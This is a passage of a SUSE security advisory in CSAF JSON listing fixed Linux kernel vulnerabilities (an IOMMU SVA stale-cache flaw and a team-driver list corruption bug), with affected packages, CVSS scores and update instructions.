"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71089",
"url": "https://www.suse.com/security/cve/CVE-2025-71089"
},
{
"category": "external",
"summary": "SUSE Bug 1256612 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "external",
"summary": "SUSE Bug 1256615 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
